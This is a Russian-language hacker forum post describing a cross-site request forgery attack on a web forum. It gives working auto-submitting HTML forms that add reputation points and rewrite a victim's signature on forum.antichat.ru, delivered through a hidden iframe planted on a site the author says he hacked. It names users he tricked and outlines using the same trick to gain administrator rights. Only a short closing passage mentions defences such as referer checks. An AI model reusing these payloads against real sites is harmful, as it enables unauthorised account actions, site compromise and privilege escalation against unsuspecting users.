Втупление
Понедельник - утро... Закончился рабочий день, и я бежал скорей домой, но не лечь в кроватку а зайти в сеть и испробовать способ выполнять команд(?) от другого пользователя на форумах... Способ на столько просто, что я даже не поверил, что он заработает =)
Итак пришел домой, просмотрев фильм "Титаник" два раза и поцеловав Лео Ди через экран сел за компутер... Вообщемто, как мы сможем "заставить" пользователя делать, то, что нам угодно... Я выбрал Добавление мне репутации и Изменение подписи пользователей...
1. Добавление репутации:
Для начала посмотрим форму добавлении репутации, для этого нажимаем на
+ какому нить пользователю и смотрим сорцы, разобрав мусор, мы выделим и подправим то, что нам нада, а именно:
<form action="http://forum.antichat.ru/reputation.php" method="post">
<input type="hidden" name="reputation" value="pos"/>Одобряю</label></div>
<input type=hidden name="score" value="0">
<input type="hidden" name="reason" value="Не помню, чтобы тебе репу ставил... Как это вышло?! >(" /> Это наш комент (вернее уже не наш)... =)
<input type="hidden" name="do" value="addreputation" />
<input type="hidden" name="p" value="183440" /> А это уже НАШЕ сообщение (т.е. на которое придет репутация)..
А какже мы заставим пользователя нажать на submit? А зачем его заставлять? Добавим id в форму и добавим событие, при котором после загрузки страницы submit "нажимаеться сам"...
Вот полный "скрипт":
<body onload="p.submit()">
<form action="http://forum.antichat.ru/reputation.php" method="post" id="p">
<input type="hidden" name="reputation" value="pos"/>Одобряю</label></div>
<input type=hidden name="score" value="0">
<input type="hidden" name="reason" value="Не помню, чтобы тебе репу ставил... Как это вышло?! >(">
<input type="hidden" name="do" value="addreputation" />
<input type="hidden" name="p" value="183440"/>
Так, тут всё ясно... Теперь осталось тока заставить пользователя(лей) зайти на эту страницу... У меня есть один хакнутый левый сайт... Я изменил главную страницу добавив в неё:
<iframe src=page.htm width=0 height=0 border=0>
Соответсвенно page.htm содержит код приведенный выше...
и еще добавил алерт с преведами, типа за этим я их и послал сюда =)...
Сидел я вмирке туда я и запостил url... Мол типа прведы вам... =) А на самом деле преведы мне... Вернее превед ("Попался тока ArdeOS =)" Он отказался удалять добавленную им репу, сославшись на респект =) Ну я не против... За это ему тоже отдельный респект...
С этим разобрались? Разобрались...
2. "Приколы".
Ну как можно "поприкалываться"... Варианты есть... Вообщемто почти все, еслибы мы были "жертвой"... Ну например добавление сообщений, ПМ, Создание темы, изменить личное инфо (кроме пароля), подпись... Я остановился на последнем... Идем с начала...
Заходим на страницу изменении подписи->Смотрим сорцы-Ювыдираем и чистим то, что нужно нам...
Покажу сразу рабочий код =)
<body onload="p.submit()">
<form action="http://forum.antichat.ru/profile.php" method="post" id="p">
<input type="hidden" name="message" value="Owned by Jesus (извините миня...) =)"> Как не сложно догодаться это и есть новая подпись =)
<input type="hidden" name="s" value="" />
<input type="hidden" name="do" value="updatesignature" />
</form>
На этот раз попалась
Fishka_Shtuchka... Теперь у неё на подписи красуться заветный текст =) ...
ЗЫ: Я ИЗВИНИЛСЯ И ИЗВИНЯЮСЬ =)
3. А теперь о серьезном...
Этот спопсоб можно применить для того, чтобы зделать себя админом...
"Теоретим": Например Админ зашел в Админку и у него сохранилась сессия, значит при следующем входе в админку форум пароль просить не будет, значит можно попробовать... Абсолютно все также! Заходим->Cмотрим сорцы->чистим и редактируем->Думаем как послать это админу->Админим =)
Защититься от этого? Ну даже не знаю... Для форума, я бы предложил зделать проверку по рефералу. Чтоб с левый url скрипты не выполнялись...
Скажет
Вася Пупкин: "Но ведь есть способы подделать referer!"... Конечно можно, но тогда нам в покете отправлять cookie... А если они у нас есть, зачем все выше сказанное? =)
Для пользователей... Пользуйтесь другим браузером, котгда гуляете по "левым" ссылкам =)
Еще раз извиняюсь =)
"Приколы" в форумах и не только... =)
Комбинированный вид